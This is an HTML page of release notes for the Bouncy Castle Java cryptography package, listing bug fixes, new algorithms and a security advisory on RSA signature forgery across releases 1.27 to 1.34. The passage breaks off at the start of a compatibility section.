<html><head><title>Bouncy Castle Crypto Package - Release Notes</title></head><body bgcolor="#ffffff" text="#000000#"><center><h1>Bouncy Castle Crypto Package - Release Notes</h1><font size=1><pre></pre></font></center><h2>1.0 Introduction</h2>The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms.  The package is organised so that it contains a light-weight API suitable for use in any environment(including the newly released J2ME) with the additional infrastructureto conform the algorithms to the JCE framework.<p><h2>2.0 Release History</h2><h3>2.1.1 Version</h3>Release 1.34<h3>2.1.2 Defects Fixed</h3><ul><li>Endianess of integer conversion in KDF2BytesGenerator was incorrect. This has been fixed.<li>Generating critical signature subpackets in OpenPGP would result in a zero packet tag. This has been fixed.<li>Some flags in PKIFailure info were incorrect, and the range of values was incomplete. The range of values has been increased and the flags corrected.<li>The helper class for AuthorityKeyExtension generation was including the subject rather than the issuer DN of the CA certificate. This has been fixed.<li>SMIMESignedParser now avoids JavaMail quoted-printable recoding issue.<li>Verification of RSA signatures done with keys with public exponents of 3 was vunerable toBleichenbacher's RSA signature forgery attack. This has been fixed.<li>PGP Identity strings were only being interpreted as ASCII rather than UTF8. This has been fixed.<li>CertificateFactory.generateCRLs now returns a Collection rather than null.</ul><h3>2.1.3 Additional Features and Functionality</h3><ul><li>An ISO18033KDFParameters class had been added to support ISO18033 KDF generators.<li>An implemention of the KDF1 bytes generator algorithm has been added.<li>An implementation of NaccacheStern encryption has been added to the lightweight API.<li>X509V2CRLGenerator can now be loaded from an existing CRL.<li>The CMS enveloped data generators will now attempt to use the default provider for encryption if the passed in provider can only handle key exchange.<li>OpenPGP file processing has been substantially speeded up.<li>The PKCS1Encoder would accept PKCS1 packets which were one byte oversize. By default this will now cause an error. However, as there are still implementations which still produce such packets the older behaviour can be turned on by setting the VM system property org.bouncycastle.pkcs1.strict to false before creating an RSA cipher using PKCS1 encoding.<li>A target has been added to the bc-build.xml to zip up the source code rather than leaving it in a directory tree.The build scripts now run this target by default.<li>Use of toUpperCase and toLowerCase has been replaced with a locale independent converter where appropriate.<li>Support for retrieving the issuers of indirect CRLs has been added.<li>Classes for doing incremental path validation of PKIX cert paths have been added to the X.509 package and S/MIME.<li>Locale issues with String.toUpperCase() have now been worked around.<li>Optional limiting has been added to ASN1InputStream to avoid possible OutOfMemoryErrors on corrupted streams.<li>Support has been added for SHA224withECDSA, SHA256withECDSA, SHA384withECDSA, and SHA512withECDSA for the generation of signatures, certificates, CRLs, and certification requests.<li>Performance of the prime number generation in the BigInteger library has been further improved.</ul><h3>2.1.5 Security Advisory</h3><ul><li>If you are using public exponents with the value three you *must* upgrade to this release, otherwise itwill be possible for attackers to exploit some of Bleichenbacher's RSA signature forgery attacks on your applications.</ul><h3>2.2.1 Version</h3>Release 1.33<h3>2.2.2 Defects Fixed</h3><ul><li>OCSPResponseData was including the default version in its encoding. This has been fixed.<li>BasicOCSPResp.getVersion() would throw a NullPointer exception if called on a default version response. This has been fixed.<li>Addition of an EC point under Fp could result in an ArithmeticException. This has been fixed.<li>The n value for prime192v2 was incorrect. This has been fixed.<li>ArmoredInputStream was not closing the underlying stream on close. This has been fixed.<li>Small base64 encoded strings with embedded white space could decode incorrectly using the Base64 class. This has been fixed.</ul><h3>2.2.3 Additional Features and Functionality</h3><ul><li>The X509V2CRLGenerator now supports adding general extensions to CRL entries.<li>A RoleSyntax implementation has been added to the x509 ASN.1 package, and the AttributeCertificateHolder class now support the IssuerSerial option.<li>The CMS API now correctly recognises the OIW OID for DSA with SHA-1.<li>DERUTF8String now supports surrogate pairs.</ul><h3>2.3.1 Version</h3>Release 1.32<h3>2.3.2 Defects Fixed</h3><ul><li>Further work has been done on RFC 3280 compliance.<li>The ASN1Sequence constructor for SemanticsInformation would sometimes throw a ClassCastException on reconstruction an object from a byte stream. This has been fixed.<li>The SharedInputStream.read(buf, 0, len) method would return 0 at EOF, rather than -1. This has been fixed.<li>X9FieldElement could fail to encode a Fp field element correctly. This has been fixed.<li>The streaming S/MIME API was occasionally leaving temporary files around. The SIMEUtil class responsible for creating the files now returns a FileBackedMimeBodyPart objectwhich has a dispose method on it which should allow removal of the file backing the body part.<li>An encoding defect in EnvelopedData generation in the CMS streaming, S/MIME API has been fixed.<li>DER constructed octet strings could cause exceptions in the streaming ASN.1 library. This has been fixed.<li>Several compatibility issues connected with EnvelopedData decoding between the streaming CMS library and other libraries have been fixed.<li>JDK 1.4 and earlier would sometimes encode named curve parameters explicitly. This has been fixed.<li>An incorrect header for SHA-256 OpenPGP clear text signatures has been fixed.<li>An occasional bug that could result in invalid clear text signatures has been fixed.<li>OpenPGP clear text signatures containing '\r' as line separators were not being correctly canonicalized. This has been fixed.</ul><h3>2.3.3 Additional Features and Functionality</h3><ul><li>The ASN.1 library now includes classes for the ICAO Electronic Passport.<li>Support has been added to CMS and S/MIME for ECDSA.<li>Support has been added for the SEC/NIST elliptic curves.<li>Support has been added for elliptic curves over F2m.<li>Support has been added for repeated attributes in CMS and S/MIME messages.<li>A wider range of RSA-PSS signature types is now supported for CRL and Certificate verification.</ul><h3>2.3.4 Possible compatibility issue</h3><ul><li>Previously elliptic curve keys and points were generated with point compression enabled by default.Owing to patent issues in some jurisdictions, they are now generated with point compression disabled by default.</ul><h3>2.4.1 Version</h3>Release 1.31<h3>2.4.2 Defects Fixed</h3><ul><li>getCriticalExtensionOIDs on an X.509 attribute certificate was returning the non-critical set. This has been fixed.<li>Encoding uncompressed ECDSA keys could occasionally introduce an extra leading zero byte. This has been fixed.<li>Expiry times for OpenPGP master keys are now recognised across the range of possible certifications.<li>PGP 2 keys can now be decrypted by the the OpenPGP library.<li>PGP 2 signature packets threw an exception on trailer processing. This has been been fixed.<li>Attempting to retrieve signature subpackets from an OpenPGP version 3 signature would throw a null pointer exception. This has been fixed.<li>Another occasional defect in EC point encoding has been fixed.<li>In some cases AttributeCertificateHolder.getIssuer() would return an empty array for attribute certificates using the BaseCertificateID.This has been fixed.<li>OIDs with extremely large components would sometimes reencode with unecessary bytes in their encoding. The optimal DER encoding will now be produced instead.</ul><h3>2.4.3 Additional Features and Functionality</h3><ul><li>The SMIME package now supports the large file streaming model as well.<li>Additional ASN.1 message support has been added for RFC 3739 in the org.bouncycastle.x509.qualified package.<li>Support has been added for Mac algorithm 3 from ISO 9797 to both the lightweight APIs and the provider.<li>The provider now supports the DESEDE64 MAC algorithm.<li>CertPathValidator has been updated to better support path validation as defined in RFC 3280.</ul><h3>2.5.1 Version</h3>Release 1.30<h3>2.5.2 Defects Fixed</h3><ul><li>Whirlpool was calculating the wrong digest for 31 byte data and could throw an exception for some other data lengths. This has been fixed.<li>AlgorithmParameters for IVs were returning a default of RAW encoding of the parameters when they should have been returning anASN.1 encoding. This has been fixed.<li>Base64 encoded streams without armoring could cause an exception in PGPUtil.getDecoderStream(). This has been fixed.<li>PGPSecretKey.copyWithNewPassword() would incorrectly tag sub keys. This has been fixed.<li>PGPSecretKey.copyWithNewPassword() would not handle the NULL algorithm. This has been fixed.<li>Directly accessing the dates on an X.509 Attribute Certificate constructed from an InputStream would return null, not the date objects. This has been fixed.<li>KEKIdentifier would not handle OtherKeyAttribute objects correctly. This has been fixed.<li>GetCertificateChain on a PKCS12 keystore would return a single certificate chain rather than null if the alias passed in represented a certificate not a key. This has been fixed.</ul><h3>2.5.3 Additional Features and Functionality</h3><ul><li>RSAEngine no longer assumes keys are byte aligned when checking for out of range input.<li>PGPSecretKeyRing.removeSecretKey and PGPSecretKeyRing.insertSecretKey have been added.<li>There is now a getter for the serial number on TimeStampTokenInfo.<li>Classes for dealing with CMS objects in a streaming fashion have been added to the CMS package.<li>PGPCompressedDataGenerator now supports partial packets on output.<li>OpenPGP Signature generation and verification now supports SHA-256, SHA-384, and SHA-512.<li>Both the lightweight API and the provider now support the Camellia encryption algorithm.</ul><h3>2.6.1 Version</h3>Release 1.29<h3>2.6.2 Defects Fixed</h3><ul><li>HMac-SHA384 and HMac-SHA512 were not IETF compliant. This has been fixed.<li>The equals() method on ElGamalKeyParameters and DHKeyParameters in the lightweight API would sometimesreturn false when it should return true. This has been fixed.<li>Parse error for OpenSSL style PEM encoded certificate requests in the PEMReader has been fixed.<li>PGPPublicKey.getValidDays() now checks for the relevant signature for version 4 and later keys as well as using theversion 3 key valid days field.<li>ISO9796 signatures for full recovered messsages could incorrectly verify for similar messages in some circumstances. This has been fixed.<li>The occasional problem with decrypting PGP messages containing compressed streams now appears to be fixed.</ul><h3>2.6.3 Additional Features and Functionality</h3><ul><li>Support has been added for the OIDs and key generation required for HMac-SHA224, HMac-SHA256, HMac-SHA384, and HMac-SHA512.<li>SignerInformation will used default implementation of message digest if signature provider doesn't support it.<li>The provider and the lightweight API now support the GOST-28147-94 MAC algorithm.<li>Headers are now settable for PGP armored output streams.</ul><h3>2.6.4 Notes</h3><ul><li>The old versions of HMac-SHA384 and HMac-SHA512 can be invoked as OldHMacSHA384 and OldHMacSHA512, or by using the OldHMac class in thelightweight API.</ul> <h3>2.7.1 Version</h3>Release 1.28<h3>2.7.2 Defects Fixed</h3><ul><li>Signatures on binary encoded S/MIME messages could fail to validate when correct. This has been fixed.<li>getExtensionValue() on CRL Entries were returning the encoding of the inner object, rather than the octet string. This has been fixed.<li>CertPath implementation now returns an immutable list for a certificate path.<li>Generic sorting now takes place in the CertificateFactory.generateCertPath() rather than CertPathValidator.<li>DERGeneralizedTime can now handle time strings with milli-seconds.<li>Stateful CertPathCheckers were not being initialised in all cases, by the CertPathValidator. This has been fixed.<li>PGPUtil file processing methods were failing to close files after processing. This has been fixed.<li>A disordered set in a CMS signature could cause a CMS signature to fail to validate when it should. This has been fixed.<li>PKCS12 files where both the local key id and friendly name were set on a certificate would not parse correctly. This has been fixed.<li>Filetype for S/MIME compressed messages was incorrect. This has been fixed.<li>BigInteger class can now create negative numbers from byte arrays.</ul><h3>2.7.3 Additional Features and Functionality</h3><ul><li>S/MIME now does canonicalization on non-binary input for signatures.<li>Micalgs for the new SHA schemes are now supported.<li>Provided and lightweight API now support ISO 7816-4 padding.<li>The S/MIME API now directly supports the creation of certificate management messages.<li>The provider and the light weight API now support the cipher GOST-28147, the signature algorithms GOST-3410 (GOST-3410 94) and EC GOST-3410 (GOST-3410 2001), the message digest GOST-3411 and the GOST OFB mode (use GOFB).<li>CMSSignedDataGenerator will used default implementation of message digest if signature provider doesn't support it.<li>Support has been added for the creation of ECDSA certificate requests.<li>The provider and the light weight API now support the WHIRLPOOL message digest.</ul><h3>2.7.4 Notes</h3><ul><li>Patches for S/MIME binary signatures and canonicalization were actually applied in 1.27, but a couple of days after the release - if the class CMSProcessableBodyPartOutbound is present in the package org.bouncycastle.mail.smime you have the patched 1.27. We would recommend upgrading to 1.28 in any caseas some S/MIME 3.1 recommendations have also been introduced for header creation.<li>GOST private keys are probably not encoding correctly and can be expected to change.</ul><h3>2.8.1 Version</h3>Release 1.27<h3>2.8.2 Defects Fixed</h3><ul><li>Typos in the provider which pointed Signature algorithms SHA256WihRSA, SHA256WihRSAEncryption, SHA384WithRSA, SHA384WithRSAEncryption, SHA512WithRSA, and SHA512WithRSAEncryption at the PSS versions of the algorithms have been fixed. The correct names for the PSS algorithms are SHA256withRSAandMGF1, SHA384withRSAandMGF1, and SHA512withRSAandMGF1.<li>X509CertificateFactory failed under some circumstances to reset properly if the input stream being passedto generateCertificate(s)() changed, This has been fixed.<li>OpenPGP BitStrength for DSA keys was being calculated from the key's generator rather than prime. This has been fixed.<li>Possible infinite loop in ASN.1 SET sorting has been removed.<li>SHA512withRSAandMGF1 with a zero length salt would cause an exception if used with a 1024 bit RSA key. This has been fixed.<li>Adding an Exporter to a PGPSubpacketVector added a Revocable instead. This has been fixed.<li>AttributeCertificateIssuer.getPrincipal() could throw an ArrayStoreException. This has been fixed.<li>CertPathValidator now guarantees to call any CertPathCheckers passed in for each certificate.<li>TSP TimeStampToken was failing to validate time stamp tokens with the issuerSerial field set in the ESSCertID structure. This has been fixed.<li>Path validation in environments with frequently updated CRLs could occasionally reject a valid path. This has been fixed.</ul><h3>2.8.3 Additional Features and Functionality</h3><ul><li>Full support has been added for the OAEPParameterSpec class to the JDK 1.5 povider.<li>Full support has been added for the PSSParameterSpec class to the JDK 1.4 and JDK 1.5 providers.<li>Support for PKCS1 signatures for SHA-256, SHA-384, and SHA-512 has been added to CMS.<li>PGPKeyRingCollection classes now support partial matching of user ID strings.<li>This release disables the quick check on the IV for a PGP public key encrypted message in order to helpprevent applications being vunerable to oracle attacks.<li>The CertPath support classes now support PKCS #7 encoding.<li>Point compression can now be turned off when encoding elliptic curve keys.</ul><h3>2.8.4 Changes that may affect compatibility</h3><ul>